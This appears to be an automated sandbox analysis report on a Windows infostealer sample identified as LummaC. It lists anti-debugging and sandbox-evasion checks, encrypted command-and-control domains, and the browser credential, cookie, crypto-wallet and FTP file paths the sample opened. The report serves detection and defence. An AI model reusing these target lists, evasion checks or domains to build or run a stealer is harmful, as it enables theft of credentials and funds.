              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2293233357.0000000000880000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2293477520.00000000008C9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: .*WProgram Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000002.2294200437.0000000000F11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exe, 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC^
              Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash-
              Source: file.exe, 00000000.00000003.2211982520.00000000058E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/Jaxx LibertyP-X-1099659-1-
              Source: file.exe, 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet8
              Source: file.exeString found in binary or memory: ExodusWeb3
              Source: file.exe, 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
